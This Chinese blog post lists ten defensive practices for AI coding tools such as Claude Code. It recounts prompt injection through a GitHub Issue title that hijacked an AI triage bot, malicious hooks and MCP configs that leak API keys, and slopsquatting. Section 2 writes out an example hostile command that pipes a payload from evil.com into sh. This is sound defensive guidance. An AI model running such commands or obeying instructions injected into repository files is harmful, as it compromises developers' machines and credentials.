
今年2月,安全研究员Adnan Khan公开了一个代号"Clinejection"的攻击链:攻击者仅凭一个GitHub Issue标题,就劫持了Cline的AI分诊机器人,偷走npm发布令牌,往npm推了一个恶意版本的Cline CLI。8小时内,大约4000台开发者的机器被静默安装了一个叫OpenClaw的AI代理——拥有完整系统权限、凭证读取能力和远程命令执行能力。
一个月前,Check Point Research披露了Claude Code的两个高危漏洞(CVE-2025-59536,CVSS 8.7):攻击者只需要在仓库的.claude/settings.json里塞一段恶意Hook配置,受害者clone下来用Claude Code打开,shell命令就在信任对话框弹出之前执行了,API密钥也跟着被重定向到攻击者服务器。
这不是理论推演。这是2026年上半年真实发生的事。
AI编程工具正在从"代码补全助手"变成"全能代理"——它们能读仓库、改文件、执行shell命令、连接外部服务、安装依赖。当工具的权限边界扩张到这个程度,你clone一个开源仓库打开它,本质上就是在让一个陌生人定义的配置文件在你机器上执行代码。
以下是10条实操准则。不是安全教科书,是真正能挡住攻击的操作清单。
● ● ●

11. 先看配置文件,再看代码
clone一个仓库之后,大多数人的第一反应是看README或者直接跑起来。在AI编程工具的语境下,正确的第一步是检查仓库里的配置文件。
需要重点审查的文件:
• .claude/settings.json — Claude Code的项目级配置,可以定义Hooks、MCP服务器、环境变量。Check Point的研究证明,这些配置可以在用户确认之前执行任意shell命令。
• .mcp.json — MCP(Model Context Protocol)服务器配置,能将API流量重定向到攻击者控制的端点。
• CLAUDE.md — Claude Code读取的项目指令文件,本质上是给AI的prompt,内容可能诱导AI执行危险操作。
• .cursorrules / .github/copilot-instructions.md — 各工具的指令文件,逻辑类似。
如果你看不懂某个配置项是干什么的,不要猜。删掉它或者注释掉,先让项目裸跑。
22. 在沙箱里跑,不在本机跑
这一条看起来是废话,但真正执行的人不多。
对于不信任的开源仓库,至少做到以下其中一条:
• 容器隔离:用Docker起一个临时容器,把仓库挂进去跑。项目挂了就删容器,不影响宿主机。
• 虚拟机隔离:UTM、VMware、VirtualBox都行,开一个快照,跑完回滚。
• 专用用户账户:如果不想折腾容器,至少新建一个低权限系统用户来运行AI编程工具,不要用你的主力账户。
Claude Code和Codex CLI都有文件系统访问和命令执行能力。如果项目配置里藏了一段rm -rf或者curl http://evil.com/payload | sh,你希望它在一个随时可以销毁的环境里执行,而不是在你存着所有项目和密钥的主力机上。

33. 检查 Hooks:它们是代码,不是配置
Claude Code的Hooks机制允许在特定事件(比如会话启动、工具调用前后)自动执行shell命令。这个设计初衷是好的——格式化代码、运行lint、自动提交。
问题是,Hooks定义在.claude/settings.json里,这个文件跟着仓库走。任何人有仓库写权限,就能往Hooks里塞东西。
Check Point发现的CVE-2025-59536核心问题就是:恶意Hook可以在信任对话框出现之前执行。 也就是说,你看到那个"是否信任此项目"的提示时,恶意代码已经跑完了。
操作建议:
• 打开任何不熟悉的仓库前,cat .claude/settings.json 看一眼Hooks部分。
• 不认识的Hook命令,直接删掉。
• 考虑在全局配置里禁用项目级Hooks,只保留你自己定义的。
44. 锁定依赖版本,防住slopsquatting
这是一个新词,2026年上半年开始密集出现:slopsquatting。
原理很简单:AI编程工具生成代码时会推荐依赖包,但大语言模型会"幻觉"——它可能推荐一个并不存在的包名。攻击者研究这些高频幻觉包名,提前在PyPI或npm上注册同名恶意包。当开发者直接安装AI推荐的依赖时,恶意代码就进来了。
Trend Micro的研究显示,在57.6万个AI生成的代码样本中,大约每5个包推荐就有1个指向不存在的包。
怎么防:
• 用lockfile:package-lock.json、poetry.lock、Pipfile.lock——锁定精确版本和哈希值。
• 审查新依赖:AI工具新增的每一个依赖,都去npm/PyPI搜一下,确认发布者、下载量、发布时间。一个昨天刚发布、下载量为0的包,大概率有问题。
• 禁止AI自动安装依赖:在AI编程工具的配置中关闭自动npm install/pip install,改为手动审核后安装。
55. 审查MCP服务器配置
MCP(Model Context Protocol)是Claude Code连接外部工具和服务的协议。项目可以通过.mcp.json定义MCP服务器,AI工具会自动连接这些服务器。
这意味着什么?一个恶意的MCP配置可以把Claude Code的API请求重定向到攻击者服务器,同时截获你的Anthropic API密钥。CVE-2026-21852就是这个攻击路径。
操作建议:
• 检查.mcp.json里的每一个server定义,特别是url字段。
• 不认识的MCP服务器,删掉。
• 如果你用的是Claude Code 2.0.65+版本,这个漏洞已修复——但旧攻击思路可能以新形式出现,审查习惯不能丢。
66. API密钥不要留在项目环境里
这一条适用于所有场景,但在AI编程工具的语境下格外重要。
AI编程代理有完整的环境变量访问权限。如果项目的配置文件里要求你设置ANTHROPIC_API_KEY或OPENAI_API_KEY,而且这个配置文件在仓库里——你的密钥就可能被重定向、被记录、被外传。
正确的做法:
• API密钥通过系统级环境变量注入,不要写在项目配置文件里。
• 使用.env文件管理密钥,确保.env在.gitignore里。
• 定期轮换API密钥,特别是在clone并运行了不信任仓库之后。
• 考虑使用API密钥的作用域限制——很多服务支持创建仅限特定功能的受限密钥。

77. 审查CI/CD工作流,尤其是AI驱动的那部分
Clinejection攻击链的起点不是代码漏洞,而是一个GitHub Actions工作流里用了AI来自动分诊Issue。攻击者在Issue标题里塞入prompt注入指令,AI机器人把它当成合法指令执行了,后续一路穿透到npm发布令牌。
2026年6月,Cloud Security Alliance的研究确认:这种"通过GitHub元数据进行prompt注入"的攻击模式,已经从单点漏洞变成了跨平台的结构性风险。Claude Code、Gemini CLI、以及多个AI驱动的GitHub Actions都存在类似问题。
操作建议:
• 审查仓库的.github/workflows/目录,特别关注使用了AI agent的工作流。
• 检查工作流是否将不可信输入(Issue标题、PR评论、外部数据)直接传递给AI。
• 对于你自己的项目:AI工作流处理的任何外部输入,都必须经过清洗和转义。
88. 最小权限原则:限制AI的访问范围
Claude Code和Codex CLI默认可以访问整个文件系统和网络。这意味着一个恶意仓库可以让AI读取你机器上的任意文件——SSH密钥、浏览器cookie、其他项目的代码。
操作建议:
• 使用工具的项目级权限配置,限制AI只能访问当前项目目录。
• Claude Code支持通过settings.json配置allowedTools,只开放你需要的工具权限。
• Codex CLI的沙箱模式默认限制网络和文件系统访问——如果不是特殊需要,不要关闭沙箱。
• 在操作系统层面,考虑用AppArmor或macOS的App Sandbox限制AI工具的系统调用。
99. 关闭信任持久化,每次重新确认
Claude Code、Codex CLI和Gemini CLI都有一个共同的设计:一旦你信任了某个项目路径,后续打开时不再弹确认。这个"信任持久化"机制意味着,如果你信任了一个项目,后来有人往里面加了恶意配置,你再次打开时不会被提醒。
Reddit上的安全讨论帖指出,这三款工具的信任都是绑定在项目路径上的——仓库内容变了,信任状态不变。
操作建议:
• 定期清理已信任的项目列表。
• 对于高风险操作,每次启动时手动确认配置文件内容。
• 不要把"信任"当作"安全"——信任只是跳过了确认步骤,安全需要你自己把关。
1010. 保持工具版本更新,关注CVE通告
Claude Code的CVE-2025-59536在1.0.111版本修复,CVE-2026-21852在2.0.65版本修复。如果你还在用旧版本,这些攻击路径对你来说是敞开的。
AI编程工具的迭代速度极快,安全补丁的发布频率也高。但独立开发者很少关注CVE通告——毕竟大家更关心新功能而不是安全补丁。
操作建议:
• 开启工具的自动更新,或者至少每周检查一次版本。
• 关注Anthropic、OpenAI、Google的安全公告邮件列表。
• 关注Check Point Research、Snyk、Cloud Security Alliance等安全研究机构的AI相关报告。
• 在Twitter/X上关注安全研究员(如Adnan Khan、RyotaK),他们经常在正式披露前分享发现。
● ● ●
11写在最后
AI编程工具让独立开发者和小团队的生产力提升了一个数量级,这是事实。但另一个事实是:这些工具正在成为新的攻击面。
2026年上半年的安全事件有一个共同特征:攻击者不再针对代码本身,而是针对AI工具的配置层、依赖层和信任层。 你的代码可能是安全的,但仓库里的.claude/settings.json、.mcp.json、CLAUDE.md这些"看起来无害"的配置文件,正在成为新的可执行代码。
10条准则的核心就一句话:把AI编程工具当作一个拥有你机器权限的陌生人来对待。 它执行的每一行配置,都需要你确认它是安全的。
不需要恐惧,但需要清醒。
● ● ●
今天就到这,希望对你有那么一点启发。
有想法别憋着,评论区聊两句,看到就回。
本文由AI辅助生成,觉得有用就点个赞 + 在看,也欢迎转给需要的朋友,咱们下篇见 👋

AI探索和成长的路上,我们一起前进!


夜雨聆风